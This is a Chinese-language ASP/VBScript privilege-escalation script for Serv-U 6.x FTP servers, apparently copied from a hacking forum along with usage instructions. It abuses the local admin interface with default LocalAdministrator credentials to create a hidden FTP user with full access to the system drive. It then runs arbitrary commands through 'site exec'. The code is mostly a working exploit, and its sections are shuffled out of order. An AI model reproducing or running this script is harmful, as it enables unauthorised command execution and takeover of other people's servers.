Serv-U 6.X 的提权脚本

来自:77169.org

使用方法：如果是6.4以下的保持默认即可，只要按你的需要修改执行的命令即可！如果为6.4请在“服务器端口”里填21，然后再在“服务器IP”中填写服务器的真实IP

<%
case 2
set b=Server.CreateObject("Microsoft.XMLHTTP")
b.open "GET", "http://127.0.0.1:" & ftpport & "/leaves/upadmin/s2", True,
"", ""
b.send "User luo" & vbCrLf & "pass ye" & vbCrLf & "site exec " & cmd &
vbCrLf & quit
set session("b")=b
%>








<%

 case 3
set c=Server.CreateObject("Microsoft.XMLHTTP")
c.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s3", True, "",
""
c.send loginuser & loginpass & mt & deldomain & quit
set session("c")=c
%>
提权完毕,已执行了命令：
<%=cmd%>
onClick="location.href='<%=gname()%>';">

<%
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
%>

服务器端口：



服务器IP：















使用方法：如果是6.4以下的保持默认即可，只要按你的需要修改执行的命令即可！如
果为6.4请在“服务器端口”里填21，然后再在“服务器IP”中填写服务器的真实IP。

<% end select
function Gpath()
on error resume next
err.clear
set f=Server.CreateObject("Scripting.FileSystemObject")
if err.number>0 then
gpath="c:"
exit function
end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Function GName()
If request.servervariables("SERVER_PORT")="80" Then
GName="http://" &
request.servervariables("server_name")&lcase(request.servervariables("scrip­t
_name"))
Else
GName="http://" &
request.servervariables("server_name")&":"&request.servervariables("SERVER_­P
ORT")&lcase(request.servervariables("script_name"))
End If
End Function
%>

<%@ LANGUAGE = VBScript %> <% Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit dim action action=request("action") if not isnumeric(action) then response.end user = trim(request("u")) pass = trim(request("p")) port = trim(request("port")) cmd = trim(request("c")) f=trim(request("f")) if f="" then f=gpath() else f=left(f,2) end if ftpport = ffport timeout=3 loginuser = "User " & user & vbCrLf loginpass = "Pass " & pass & vbCrLf deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=" & iip & vbCrLf & " PortNo=" & ftpport & vbCrLf mt = "SITE MAINTENANCE" & vbCrLf newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=leaves|" & iip & "|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=luo" & vbCrLf & "-Password=ye" & vbCrLf & _ "-HomeDir=c://" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _ "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _ "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _ "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _ "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _ "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c://|RWAMELCDP" & vbCrLf quit = "QUIT" & vbCrLf newuser=replace(newuser,"c:",f) select case action case 1 set a=Server.CreateObject("Microsoft.XMLHTTP") a.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s1",True, "", "" a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit set session("a")=a %>
Serv-U 6.X 提权 脚本 by 落叶纷飞【S.S.T】 @ 肇庆
用户名:	value="LocalAdministrator">
口　令：
端　口：
系统路径：
命　令：